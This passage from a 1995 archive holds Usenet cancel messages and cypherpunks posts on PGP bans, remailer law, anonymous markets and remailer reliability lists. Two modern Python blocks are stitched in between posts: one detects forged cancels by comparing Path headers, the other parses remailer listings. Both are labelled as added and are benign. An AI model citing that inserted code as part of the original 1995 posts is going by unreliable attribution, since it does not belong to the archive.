 from within trn.

Path: rand.org!usc!howland.reston.ans.net!newsfeed.internetmci.com!news.msfc.nas
a.gov!elroy.jpl.nasa.gov!sdd.hp.com!hplabs!unix.sri.com!news.Stanford.EDU!not-fo
r-mail
From: llurch@Networking.Stanford.EDU (Richard Charles Graves)
Newsgroups: control,comp.protocols.tcp-ip.ibmpc,comp.os.ms-windows.networking.tc
p-ip
Subject: cmsg cancel <Pine.ULT.3.91.951013145012.29858A-100000@Networking.Stanfo
rd.EDU>
Control: cancel <Pine.ULT.3.91.951013145012.29858A-100000@Networking.Stanford.ED
U>
Date: 13 Oct 1995 16:00:48 -0700
Organization: Stanford University, CA 94305, USA
Lines: 1
Message-ID: <45mr30$kh@Networking.Stanford.EDU>
NNTP-Posting-Host: networking.stanford.edu

cancel <Pine.ULT.3.91.951013145012.29858A-100000@Networking.Stanford.EDU>

Path: rand.org!usc!math.ohio-state.edu!uwm.edu!lll-winken.llnl.gov!fnnews.fnal.g
ov!unixhub!news.Stanford.EDU!not-for-mail
From: llurch@Networking.Stanford.EDU (Richard Charles Graves)
Newsgroups: comp.os.ms-windows.win95.misc,comp.os.ms-windows.win95.setup,comp.os
.ms-windows.apps.winsock.mail,comp.os.ms-windows.apps.winsock.misc,comp.os.ms-wi
ndows.apps.winsock.news
Subject: cmsg cancel <45nvip$ab6@nntp.Stanford.EDU>
Control: cancel <45nvip$ab6@nntp.Stanford.EDU>
Date: 14 Oct 1995 02:32:23 -0700
Organization: Stanford University
Lines: 1
Message-ID: <45o038$3ip@Networking.Stanford.EDU>
NNTP-Posting-Host: networking.stanford.edu

<45nvip$ab6@nntp.Stanford.EDU> was cancelled from within trn.
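
The Path comparison suggested in the message above, as an added example that is not part of the original post: it unfolds hard-wrapped headers in pasted cancel articles and reports where a cancel's Path departs from that of a known-good cancel by the same author. Hosts, Message-IDs and function names are constructed for illustration; a divergent hop is a lead for contacting that site's news administrator, not proof of forgery.

```python
import re

HEADER_START = re.compile(r"^[A-Za-z][A-Za-z0-9-]*: ")

# Constructed sample (invented hosts and Message-IDs). Long header lines are
# hard-wrapped mid-token, the way a pasted article usually arrives.
SAMPLE = """\
Path: reader.example!hub1.example!hub2.example!campus.example!not-for-mai
l
From: author@campus.example (Constructed Author)
Subject: cmsg cancel <orig1@campus.example>
Control: cancel <orig1@campus.example>
Message-ID: <c1@campus.example>

<orig1@campus.example> was cancelled from within trn.

Path: reader.example!hub1.example!feed.elsewhere.example!gw.elsewhere.exa
mple!hub2.example!campus.example!not-for-mail
From: author@campus.example (Constructed Author)
Subject: cmsg cancel <orig2@campus.example>
Control: cancel <orig2@campus.example>
Message-ID: <c2@campus.example>

<orig2@campus.example> was cancelled from within trn.

Path: reader.example!hub1.example!hub2.example!campus.example!not-for-mail
From: author@campus.example (Constructed Author)
Subject: cmsg cancel <orig3@campus.example>
Control: cancel <orig3@campus.example>
Message-ID: <c3@campus.example>

<orig3@campus.example> was cancelled from within trn.
"""


def unfold(block):
    """Rebuild headers from a block whose long lines were cut at a fixed width."""
    headers, name = {}, None
    for line in block.splitlines():
        if HEADER_START.match(line):
            name, value = line.split(": ", 1)
            name = name.lower()
            headers[name] = value
        elif name:
            headers[name] += line  # hard wrap: nothing was inserted at the cut
    return headers


def parse_cancels(text):
    """Return one record per cancel control message found in the pasted text."""
    cancels = []
    for block in re.split(r"\n[ \t]*\n", text.strip()):
        if not block.startswith("Path: "):
            continue  # article body, not a header block
        h = unfold(block)
        m = re.match(r"cancel\s+(<[^>]+>)", h.get("control", ""))
        if m:
            cancels.append({"id": h.get("message-id"), "from": h.get("from"),
                            "target": m.group(1), "hops": h["path"].split("!")})
    return cancels


def compare_paths(reference, suspect):
    """Compare two Paths from the origin (right-hand) end.

    Each relay prepends its own name, so hops to the left of the injection
    point were written by servers, while the tail can be supplied by whoever
    posted the article. The first hop left of the shared tail is where the
    suspect's route stops matching the reference.
    """
    ref, sus = reference["hops"], suspect["hops"]
    n = 0
    while n < min(len(ref), len(sus)) and ref[-1 - n] == sus[-1 - n]:
        n += 1
    shared_tail = sus[len(sus) - n:]
    unexpected = [hop for hop in sus if hop not in ref]
    divergent = sus[len(sus) - n - 1] if n < len(sus) else None
    return shared_tail, unexpected, divergent


def triage(text, reference_id):
    """List cancels that claim the reference's author but took other hops."""
    cancels = parse_cancels(text)
    reference = next(c for c in cancels if c["id"] == reference_id)
    findings = []
    for c in cancels:
        if c is reference or c["from"] != reference["from"]:
            continue
        tail, unexpected, divergent = compare_paths(reference, c)
        if unexpected:
            findings.append({"cancel": c["id"], "target": c["target"],
                             "shared_tail": tail,
                             "unexpected_hops": unexpected,
                             "first_divergent_hop": divergent})
    return findings


if __name__ == "__main__":
    for finding in triage(SAMPLE, "<c1@campus.example>"):
        print(finding)
```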




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1018954@aix2.uottawa.ca
Date: Sun, 15 Oct 95 22:06:02 PDT
To: Black Unicorn <unicorn@polaris.mindport.net>
Subject: alt.paranoia.pgp.ban: long rerun (was Re: My chat with...)
In-Reply-To: <Pine.SUN.3.91.951015221121.29505A-100000@polaris.mindport.net>
Message-ID: <Pine.3.89.9510152224.H11124-0100000@aix2.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain




On Sun, 15 Oct 1995, Black Unicorn wrote:

> in place.  Here that piece is, obviously, banning tomorrow's pgp.

Frankly I think that's what it would take for everyone to start using it
(not that I would on this multiuser account, that's what winsock and my pc 
are for). Just look at lsd, until it became illegal, only researchers and 
psychiatric patients took it. Strange things like crypto really become 
popularized (even through notoriety) when they "shouldn't" be had. Also 
seems like the only way to get any mainstream press. Bad press is better than 
next to none. BBrother schemes like clipper also generate lotsa mainstream
press. I can't wait for Freeh and Clinton to start making sweet 
releases about the sequel. Big ones. What's going on on that front anyway?

> > except as PR, why DO they still take this seriously? (unless you want to 
> > be paranoid about a ban, hmm, nevermind, debated-to-death)
> 
> I'm not so sure it's paranoid.  You have trial balloons floating all 
> over.  Freeh is a prime example, and no one is screaming loudly enough to 
> shoot down his blimp.  That's a big'ole green light for regulators.
> 
Being paranoid is a prerequisite for being on this list in the first 
place :-)
But seriously, yes I do agree with you. We know just how much they'd love
to get rid of it. That being said, wasn't legal protection for crypto the 
reason EFF caved on the dreaded DT bill? (sorry, DT law. Yech, that's tough)
First they're going to have to get rid of that. How strong is the protection 
anyway? 

*Begin flogging dead horse* (not a Unicorn)
Flog

Fine, let's just say I don't think it can stick, we could argue this 
back and forth and I'm sure it's been done before. We benefit from any
move towards a ban through a measure of publicity. We benefit once again 
from a ban due to programmers like Phil Z. getting terrified and outraged
enough to write code. PGP is the product of a previous attempted ban.
We'd have PEM or RIPEM otherwise (with no-one using them). 
Flog

If there is a market to avoid American anti-privacy and subpoena regs, openly 
or in the black, this is where it will get its start. I understand that key 
signing parties are all the rage at ietf meetings. I think a lot of those 
people would be angry enough to go for a strong privacy IP before any ban 
went into effect. Remember the US is not the whole of the world. Go to 
Anguilla or Vancouver or Montreal or Baja Cali...with those thoughts in your 
head, and you can have your cpunk ietf meeting and implement and 
distribute the code. 
Flog Flog Flog

And then there's the courts...

I think any ban of a "desirable" product is self defeating. Just look at how 
little popular and even police support the marijuana ban has. Even Newt 
admits to having tried. Unlike crypto, marijuana has a physical presence 
and requires transportation, even then it's also totally unenforceable 
(even though it lands a very large amount of people in jail). A lot of people 
OTOH support the ban on cocaine, yet somehow, supposedly crack only costs 
$5/vial in NYC, and is available in every city in the world. A crypto ban 
would be even harder than making people pay for all their software. 
Pirate software is illegal in most of the world. Are the fine legislators of 
North America, where practically all the software is written, totally innocent 
of this heinous crime?

It can't stick. Either outcome puts crypto and anonymity ahead in some way.

End of dead horse flogging. Sigh. Sorry for an overlong post. 







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@dg.thepoint.net>
Date: Sun, 15 Oct 95 22:08:52 PDT
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: PA Remailer Concerns
In-Reply-To: <aca715081d0210044fe2@[205.199.118.202]>
Message-ID: <Pine.D-G.3.91.951016010818.18734D-100000@dg.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 15 Oct 1995, Timothy C. May wrote:

> At 2:13 AM 10/16/95, Futplex wrote:
> 
> >I would very much like to see this law tested. I think it could prove fairly
> >important to attack it with a well-planned, benign test case rather than wait
> >for the next National Liberation spam or a death threat.
> >
> >I don't live in PA, but I would be willing to participate as the defendant in
> >a test case under the right circumstances. Presumably I would open an
> >account with an ISP in Penna., set up a remailer on the account (need to find
> >an ISP that clearly allows that), and have somebody send a message through it.
> >
> >We would need to design a promising test case and find an attorney willing &
> >able to offer pro bono services.
> 
> I'm not a lawyer, though I hang out on the "Cyberia" list and I watched a
> lot of the OJ trial. :-}
> 
> Seriously, it is hard to "design a promising test case" in this way.
> They--the Pennsylvania law enforcement authorities--don't have to take the
> bait. They can just do nothing, until an incident arises which provokes
> them. Maybe next year, maybe five years from now. Such an incident is
> likely to be one that they figure will make for a popular prosecution. One
> of the Four Horsemen, probably.

I must've missed that day from the O.J. trial.  You are, of course, 
correct that you can't force the state to prosecute you.  You might try 
the following, however, depending on Pennsylvania law (where I am not 
admitted, this isn't legal advice, you aren't my client, and all that 
other crap ...):

Let's say someone decided to set up a commercial remailing service and 
had an aunt with an empty bedroom, phone lines, and a powerful computer 
which she only used to save her recipes.  She happens to live in 
Pennsylvania, near an ISP that allows remailers ...  She offers to help.

You obtain the service of Pennsylvania counsel to advise you on the legal 
aspects of your proposed service.  The lawyer refers you to the new 
statute and says it may be a problem.

Your proposal's success or failure rides on the interpretation of the 
statute. So you instruct your lawyer to review the possibility of filing 
a civil suit for declaratory relief concerning the constitutionality of 
the statute and the interpretation of the statute.  Your civil complaint 
frames the terms of the (public) debate and is the subject of any initial 
press coverage before the Pa. Attorney General has even heard of the suit....


 
> --Tim May
> 
> Views here are not the views of my Internet Service Provider or Government.
> ---------:---------:---------:---------:---------:---------:---------:----
> Timothy C. May              | Crypto Anarchy: encryption, digital money,
> tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
> Corralitos, CA              | knowledge, reputations, information markets,
> Higher Power: 2^756839      | black markets, collapse of governments.
> "National borders are just speed bumps on the information superhighway."
> 
> 
> 

Not a lawyer on the Net, although I play one in real life.
**********************************************************
Flame away! I get treated worse in person every day!!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wei Dai <weidai@eskimo.com>
Date: Mon, 16 Oct 95 01:18:51 PDT
To: Cypherpunks <cypherpunks@toad.com>
Subject: transaction costs in anonymous markets
Message-ID: <Pine.SUN.3.91.951016011355.2241A-100000@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


Some people have predicted (advocated?) frictionless capitalism, which 
will be brought about by the use of digital technology to reduce transaction 
costs.  However, in anonymous markets these costs may be quite high.  
Two main components of transaction cost in an anonymous market will be 
the cost to maintain anonymity and the cost to evaluate reputations.

Maintaining anonymity requires that communications be done through 
special untraceable protocols.  The current state-of-art (i.e. 
RemailerNet) adds several hours of transmission time to each message to 
achieve effective untraceability.  Contract negotiation, for example, 
becomes very difficult under these circumstances.  Untraceable 
communications also use up more computing and communications resources.  
Although remailers don't yet charge any money to pass along messages, 
this is sure to change in the future.  Unless the structure of the 
Internet is completely redesigned, untraceable messages will always cost 
more than traceable ones, although I hope this cost difference can be 
reduced through technical advances.

The second big part of transaction cost in an anonymous market is 
reputation evaluation.  Of course, normal, everyday transactions require 
reputations to be evaluated.  However, more effort and cost will be 
expended on these evaluations in an anonymous market because the effects 
of misevaluations will be much more damaging.  Reputations must be 
constantly reevaluated, as pseudonyms are easily transferred.  Since no 
good theories of reputation currently exist, these evaluations are 
difficult to automate.  Perhaps theoretical advances can make these 
evaluations easier and/or more accurate.  However there does not appear 
to be any major research effort in this area.

If these costs remain high, but anonymous markets develop regardless, it 
will be interesting to see how these costs affect the structure of the 
markets.  Will special protocols for contract negotiations develop to 
minimize the number of round-trip messages?  Will each market be 
dominated by a few big entities because people can't keep track of 
reputations of many smaller players?  But then how will these big 
entities be organized?

Wei Dai




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 16 Oct 95 03:30:46 PDT
To: cypherpunks@toad.com
Subject: MUZ_zle
Message-ID: <199510161030.GAA01063@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   10-16-95. NYPaper:


   "The New Watchdogs of Digital Commerce."

      Think of them as a truth squad of cyberspace, these
      crusading graduate-student hackers from Berkeley. "This
      is a tradition of unfettered inquiry and curiosity,"
      said John Gilmore, "for hackers, nothing is sacred and
      everything is subject to verification before you can
      really believe it."

      "The hacker ethic is transferring some of its better
      lessons to the world of commerce," said Steven Levy,
      "we're groping for a way to use the Net in a way where
      information will flow freely and people can still make
      money. The hackers are going to help us find ways to
      have a more humanized system of commerce."


   "Will Netscape be the next Microsoft, or the next victim of
   Microsoft?"

      Some investors believe Netscape could become "the next
      Microsoft." Other people believe that Netscape could
      become the next Microsoft victim, and that the next
      Microsoft is none other than Microsoft itself.

      All these new features of Navigator 2.0 send a clear
      notice to the industry that Netscape has no interest in
      bowing to the traditional Internet procedures for
      setting software standards by academic and scientific
      committee. The Internet has become primarily a
      commercial medium, where standards are set by whoever
      has the highest market share. It is a concept Microsoft
      knows well, and one that Netscape has grasped.


   MUZ_zle  (16 kb)












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@CS.Berkeley.EDU>
Date: Mon, 16 Oct 95 06:51:48 PDT
To: cypherpunks@toad.com
Subject: List of reliable remailers
Message-ID: <199510161351.GAA02832@kiwi.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


   I operate a remailer pinging service which collects detailed
information about remailer features and reliability.

   To use it, just finger remailer-list@kiwi.cs.berkeley.edu

   There is also a Web version of the same information, plus lots of
interesting links to remailer-related resources, at:
http://www.cs.berkeley.edu/~raph/remailer-list.html

   This information is used by premail, a remailer chaining and PGP
encrypting client for outgoing mail, which is available at:
ftp://ftp.csua.berkeley.edu/pub/cypherpunks/premail/premail-0.33a.tar.gz

   For the PGP public keys of the remailers, finger
pgpkeys@kiwi.cs.berkeley.edu

This is the current info:

                                 REMAILER LIST

   This is an automatically generated listing of remailers. The first
   part of the listing shows the remailers along with configuration
   options and special features for each of the remailers. The second
   part shows the 12-day history, and average latency and uptime for each
   remailer. You can also get this list by fingering
   remailer-list@kiwi.cs.berkeley.edu.

$remailer{"extropia"} = "<remail@extropia.wimsey.com> cpunk pgp special";
$remailer{"portal"} = "<hfinney@shell.portal.com> cpunk pgp hash";
$remailer{"alumni"} = "<hal@alumni.caltech.edu> cpunk pgp hash";
$remailer{"bsu-cs"} = "<nowhere@bsu-cs.bsu.edu> cpunk hash ksub";
$remailer{"c2"} = "<remail@c2.org> eric pgp hash reord";
$remailer{"penet"} = "<anon@anon.penet.fi> penet post";
$remailer{"ideath"} = "<remailer@ideath.goldenbear.com> cpunk hash ksub reord";
$remailer{"hacktic"} = "<remailer@utopia.hacktic.nl> cpunk mix pgp hash latent cut post ek";
$remailer{"flame"} = "<remailer@flame.alias.net> cpunk mix pgp. hash latent cut post ek reord";
$remailer{"rahul"} = "<homer@rahul.net> cpunk pgp hash filter";
$remailer{"mix"} = "<mixmaster@remail.obscura.com> cpunk mix pgp hash latent cut ek ksub reord";
$remailer{"syrinx"} = "<syrinx@c2.org> cpunk pgp hash cut reord mix post";
$remailer{"ford"} = "<remailer@bi-node.zerberus.de> cpunk pgp hash ksub";
$remailer{"hroller"} = "<hroller@c2.org> cpunk pgp hash mix cut ek";
$remailer{"vishnu"} = "<mixmaster@vishnu.alias.net> cpunk mix pgp. hash latent cut ek ksub reord";
$remailer{"robo"} = "<robo@c2.org> cpunk hash mix";
$remailer{"replay"} = "<remailer@replay.com> cpunk mix pgp hash latent cut post ek";
$remailer{"spook"} = "<remailer@valhalla.phoenix.net> cpunk mix pgp hash latent cut ek reord";
$remailer{"gondolin"} = "<mixmaster@gondolin.org> cpunk mix hash latent cut ek ksub reord";
$remailer{"rmadillo"} = "<remailer@armadillo.com> mix cpunk pgp hash latent cut";
$remailer{"ncognito"} = "<ncognito@gate.net> cpunk";
$remailer{"precip"} = "<mixmaster@mix.precipice.com> cpunk mix pgp hash latent cut ek reord";
$remailer{"ecafe"} = "<remail@ecafe.org> cpunk mix";
$remailer{"wmono"} = "<wmono@valhalla.phoenix.net> cpunk mix pgp. hash latent cut ek";
catalyst@netcom.com is _not_ a remailer.
lmccarth@ducie.cs.umass.edu is _not_ a remailer.
usura@replay.com is _not_ a remailer.

Use "premail -getkeys pgpkeys@kiwi.cs.berkeley.edu" to get PGP keys
for the remailers. Fingering this address works too.

remailer  email address                        history  latency  uptime
-----------------------------------------------------------------------
replay   remailer@replay.com              +-**+*+*****    10:11  99.96%
ideath   remailer@ideath.goldenbear.com   --.--------   5:23:14  99.81%
mix      mixmaster@remail.obscura.com     +--+---+ --   1:32:40  99.24%
hacktic  remailer@utopia.hacktic.nl       +-**-***   *    12:11  99.06%
portal   hfinney@shell.portal.com         #-####*   **     3:14  99.02%
alumni   hal@alumni.caltech.edu            -***  +  +*     8:12  98.64%
bsu-cs   nowhere@bsu-cs.bsu.edu            -#+#**#   *    13:10  98.50%
vishnu   mixmaster@vishnu.alias.net       *-+**   * **    11:44  98.49%
rmadillo remailer@armadillo.com           +-+- +++ +++    49:21  98.47%
ecafe    remail@ecafe.org                 #--*-++-        12:28  98.33%
penet    anon@anon.penet.fi               -- +- -  -++  2:32:53  97.85%
syrinx   syrinx@c2.org                    +-+ ---- --+  1:49:27  97.81%
spook    remailer@valhalla.phoenix.net    +- +*+ ** **    27:04  97.74%
wmono    wmono@valhalla.phoenix.net       *-+ ** * ***    12:20  97.69%
flame    remailer@flame.alias.net         +-**   + ***    29:29  95.55%
gondolin mixmaster@gondolin.org           _____.-*-    30:45:37  94.88%
c2       remail@c2.org                    +-+  +++  ++  1:13:25  94.79%
extropia remail@extropia.wimsey.com       ..------ --   5:32:18  94.02%
rahul    homer@rahul.net                    # +-+*# **     4:39  99.20%
ford     remailer@bi-node.zerberus.de          --. --  10:53:23  76.55%

   History key
     * # response in less than 5 minutes.
     * * response in less than 1 hour.
     * + response in less than 4 hours.
     * - response in less than 24 hours.
     * . response in more than 1 day.
     * _ response came back too late (more than 2 days).

   cpunk
          A major class of remailers. Supports Request-Remailing-To:
          field.
          
   eric
          A variant of the cpunk style. Uses Anon-Send-To: instead.
          
   penet
          The third class of remailers (at least for right now). Uses
          X-Anon-To: in the header.
          
   pgp
          Remailer supports encryption with PGP. A period after the
          keyword means that the short name, rather than the full email
          address, should be used as the encryption key ID.
          
   hash
          Supports ## pasting, so anything can be put into the headers of
          outgoing messages.
          
   ksub
          Remailer always kills subject header, even in non-pgp mode.
          
   nsub
          Remailer always preserves subject header, even in pgp mode.
          
   latent
          Supports Matt Ghio's Latent-Time: option.
          
   cut
          Supports Matt Ghio's Cutmarks: option.
          
   post
          Post to Usenet using Post-To: or Anon-Post-To: header.
          
   ek
          Encrypt responses in reply blocks using Encrypt-Key: header.
          
   special
          Accepts only pgp encrypted messages.
          
   mix
          Can accept messages in Mixmaster format.
          
   reord
          Attempts to foil traffic analysis by reordering messages. Note:
          I'm relying on the word of the remailer operator here, and
          haven't verified the reord info myself.

   mon
          Remailer has been known to monitor contents of private email.
          
   filter
          Remailer has been known to filter messages based on content. If
          not listed in conjunction with mon, then only messages destined
          for public forums are subject to filtering.
          

Raph Levien
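
A parser for the listing format shown in the message above, as an added example that is not premail's code or part of the original post: it reads the `$remailer{...}` capability lines and the latency/uptime table, applies the "pgp." key-ID rule, and picks remailers that meet a capability and reliability requirement. The remailer names and addresses in the sample are constructed, and the function names and thresholds are assumptions.

```python
import re

CAP_LINE = re.compile(r'^\$remailer\{"([^"]+)"\}\s*=\s*"<([^>]+)>\s*([^"]*)";\s*$')
# The history column may contain spaces, so a table row is matched from both
# ends: name and address on the left, latency and uptime on the right.
STAT_LINE = re.compile(
    r'^(\S+)\s+(\S+@\S+)\s(.*?)\s+(\d+(?::\d+){1,2})\s+(\d+(?:\.\d+)?)%\s*$')

# Constructed listing in the same layout (addresses are invented).
LISTING = '''\
$remailer{"alpha"} = "<remailer@alpha.example> cpunk mix pgp hash latent cut ek";
$remailer{"bravo"} = "<mix@bravo.example> cpunk mix pgp. hash cut reord";
$remailer{"carol"} = "<anon@carol.example> cpunk pgp hash mon";
$remailer{"delta"} = "<remail@delta.example> cpunk mix pgp hash";
$remailer{"echo"} = "<echo@echo.example> cpunk hash ksub";

remailer  email address                        history  latency  uptime
-----------------------------------------------------------------------
alpha    remailer@alpha.example           +-**+*+*****    10:11  99.96%
bravo    mix@bravo.example                *-+**   * **  1:32:40  98.49%
carol    anon@carol.example               #-####*   **     3:14  99.02%
echo     echo@echo.example                   --. --    10:53:23  76.55%
'''


def latency_seconds(text):
    """Convert 'm:ss' or 'h:mm:ss' into seconds."""
    seconds = 0
    for part in text.split(":"):
        seconds = seconds * 60 + int(part)
    return seconds


def parse_listing(text):
    """Return {short name: record}; capability lines must precede the table."""
    remailers = {}
    for line in text.splitlines():
        m = CAP_LINE.match(line.strip())
        if m:
            name, address, caps = m.groups()
            words = caps.split()
            has_pgp = any(w.rstrip(".") == "pgp" for w in words)
            remailers[name] = {
                "address": address,
                "caps": {w.rstrip(".") for w in words},
                # "pgp." means the short name is the encryption key ID;
                # plain "pgp" means the full address is.
                "key_id": (name if "pgp." in words else address) if has_pgp else None,
                "latency": None,
                "uptime": None,
            }
            continue
        m = STAT_LINE.match(line)
        if m and m.group(1) in remailers:
            record = remailers[m.group(1)]
            if record["address"] != m.group(2):
                continue  # table row disagrees with the capability line
            record["latency"] = latency_seconds(m.group(4))
            record["uptime"] = float(m.group(5))
    return remailers


def select(remailers, need=("cpunk", "pgp"), min_uptime=98.0, max_latency=3600):
    """Names meeting the requirements, most reliable first.

    Remailers without a table row have no measured reliability and are
    skipped, as are those flagged "mon" (known to monitor private mail).
    """
    picked = []
    for name, r in remailers.items():
        if r["uptime"] is None or "mon" in r["caps"]:
            continue
        if not set(need) <= r["caps"]:
            continue
        if r["uptime"] < min_uptime or r["latency"] > max_latency:
            continue
        picked.append(name)
    return sorted(picked, key=lambda n: -remailers[n]["uptime"])


if __name__ == "__main__":
    table = parse_listing(LISTING)
    for name in select(table, need=("mix", "pgp"), max_latency=7200):
        print(name, table[name]["key_id"], table[name]["uptime"])
```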




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "John A. Perry" <perry@alpha.jpunix.com>
Date: Mon, 16 Oct 95 05:06:20 PDT
To: Mixmaster Mailing List <cypherpunks@toad.com
Subject: Weekly MixMaster list
Message-ID: <Pine.BSD.3.91.951016065746.5906A-100000@alpha.jpunix.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

	Here is the current type2.list/pubring.mix as it stands on
vishnu.alias.net. Please note that the email addresses for
mixmaster@spook.alias.net and wmono@spook.alias.net have changed. These
addresses NO LONGER WORK! Please make note of the new addresses. 

type2.list

vishnu mixmaster@vishnu.alias.net bb460f08811a98682def423d30852d11 2.0
spook remailer@valhalla.phoenix.net ca8c8679f7b1cbdcff46d780fba97673 2.0
flame remailer@flame.alias.net 64bbf500097b541a8ddcb2dd80373238 2.0b11
anon mixmaster@anon.alias.net e3ca4cc5beb9934ae6d52dd27da80332 2.0.2b
secrets secret@secret.alias.net bc2e4251dbddfa74dfae8b274904c2be 2.0.2b
wmono wmono@valhalla.phoenix.net f68e6add16880b60eb48a4a4330e2e36 2.0.1
mix mixmaster@obscura.com db91418edac3a4d7329feaee0b79c74f 2.0.1
knight mixmaster@aldebaran.armory.com 6bb0d89a29fd188c67b8e04516b5af33 2.0
robomix robo@c2.org 3d523f1fd30b5a1c57214960a00f1c4e 2.0b11
syrinx syrinx@c2.org 6c4e7372e84d7092e0d0e69c20d5be46 2.0b11
rebma mixer@rebma.mn.org e7d84921298b0aadaf8f050d145ccf03 2.0b11
replay remailer@replay.com e3e2b4d67314b6165ee03b0b0ae07a7f 2.0b11
hacktic remailer@utopia.hacktic.nl bf61835a7b3cfa59c409caeab4e8a222 2.0b11
crynwr remailer@crynwr.com 64c62de6b347b3050fbb6e94c649112d 2.0b11
gondolin mixmaster@gondolin.org 1d767b08fefa0a79d508be73e472d326 2.0.1
q q@c2.org c44e1cb0f0709465c21b07ac972bf973 2.0.1
Armadillo remailer@armadillo.com 7251877ae6fed509ebf7567715974d1b 2.0.1

pubring.mix

mix mixmaster@obscura.com db91418edac3a4d7329feaee0b79c74f 2.0.1


vishnu mixmaster@vishnu.alias.net bb460f08811a98682def423d30852d11 2.0b11


knight mixmaster@aldebaran.armory.com 6bb0d89a29fd188c67b8e04516b5af33 2.0


robomix robo@c2.org 3d523f1fd30b5a1c57214960a00f1c4e 2.0b11


syrinx syrinx@c2.org 6c4e7372e84d7092e0d0e69c20d5be46 2.0b11


rebma mixer@rebma.mn.org e7d84921298b0aadaf8f050d145ccf03 2.0b11


replay remailer@replay.com e3e2b4d67314b6165ee03b0b0ae07a7f 2.0b11


hacktic remailer@utopia.hacktic.nl bf61835a7b3cfa59c409caeab4e8a222 2.0b11


crynwr remailer@crynwr.com 64c62de6b347b3050fbb6e94c649112d 2.0b11


spook remailer@valhalla.phoenix.net ca8c8679f7b1cbdcff46d780fba97673 2.0


flame remailer@flame.alias.net 64bbf500097b541a8ddcb2dd80373238 2.0b11


gondolin mixmaster@gondolin.org 1d767b08fefa0a79d508be73e472d326 2.0.1



q q@c2.org c44e1cb0f0709465c21b07ac972bf973 2.0.1


Armadillo remailer@armadillo.com 7251877ae6fed509ebf7567715974d1b 2.0.1


secrets secret@secret.alias.net bc2e4251dbddfa74dfae8b274904c2be 2.0.2b


anon mixmaster@anon.alias.net e3ca4cc5beb9934ae6d52dd27da80332 2.0.2b


wmono wmono@valhalla.phoenix.net f68e6add16880b60eb48a4a4330e2e36 2.0.1



 John Perry - KG5RG - perry@alpha.jpunix.com -  PGP-encrypted e-mail welcome!
 WWW - http://www.jpunix.com
 PGP 2.62 key for perry@jpunix.com is on the keyservers.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Processed by mkpgp, a Pine/PGP interface.

iQEVAwUBMIJKdaghiWHnUu4JAQHNJQf/YVjJn/WFKTi5gdjtnkOy5DprQYcoiAZ3
44/d4fq34cYdghEaK2WnROXqUn+nQbd2xqDt68KdG9Y+AsyzYo0oue+ec/juevH7
CobBO/E45dR2Ey7eUBhp/cjAJcF/R+BCGPFsrvVFjZETUhRougqWP/d0w1nxyuUI
Z0BPqiLEU/Zi7tTf++qK12YFHc0bBFk52jc2rjlwk4MDcra/Gihf834fZ6QB3nRT
mcpKaWQB2NODXwT8VOr19Fv44EyKx+QsNMX5DREcLB/GxKZjgsSArFSGRg6AiR+k
VMAwO07JSXr85/EKrbepSIWQQM19jGB7tQq6UpkLERbFQmx/yrgAwA==
=jYbQ
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Bob Bruen, MIT Lab for Nuclear Science" <BRUEN@mitlns.mit.edu>
Date: Mon, 16 Oct 95 04:35:37 PDT
To: cypherpunks@toad.com
Subject: was: My chat with Goeff Greiveldinger
Message-ID: <951016073248.44606d5d@mitlns.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain



Previous post:

>I've heard cracking into Equifax and TRW is considered a rite of passage in 
>the phreaker crowd. The security would have to *damn* tight (as in forget 
>it) for it to be trustworthy. And since it would probably be the big three
>credit rating agencies (I forget the other one), their track record is not 

 Here are the three credit reporting orgs plus the medical reporting org.
 The cost is $8 to get your report.

----------------------------------------
CBI Equifax Credit Information Services
PO Box 740256
Atlanta, GA 30374
----------------------------------------
Trans Union
Consumer Relations Center
208 South Market
Wichita, KS 67202
----------------------------------------
TRW
National Consumer Assistance Center
PO Box 749029
Dallas, TX 75374
----------------------------------------
Medical Information Bureau
PO Box 105 Essex Station
Boston MA 02112
----------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: SINCLAIR  DOUGLAS N <sinclai@ecf.toronto.edu>
Date: Mon, 16 Oct 95 04:35:34 PDT
To: cypherpunks@toad.com
Subject: PGP out of RAM
Message-ID: <95Oct16.073513edt.1500@cannon.ecf.toronto.edu>
MIME-Version: 1.0
Content-Type: text/plain


It seems PGP has been too successful.  I downloaded the entire keyring
from keys.pgp.net; it's almost 9Mb of ASCII armour.  However, I can't
get PGP for DOS to process the files.  It, understandably, gives me an
Out Of Memory error.  Is there any sneaky way of getting around this,
barring the obvious switch to PGP for Linux?  It seems PGP is constrained
to the basic DOS 640Kb, or 704Kb if I remove my VGA card.



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Mon, 16 Oct 95 07:56:30 PDT
To: Wei Dai <weidai@eskimo.com>
Subject: Re: transaction costs in anonymous markets
In-Reply-To: <Pine.SUN.3.91.951016011355.2241A-100000@eskimo.com>
Message-ID: <Pine.SUN.3.91.951016074023.1719B-100000@crl.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Mon, 16 Oct 1995, Wei Dai wrote:

. . .
> Two main components of transaction cost in an anonymous market will be 
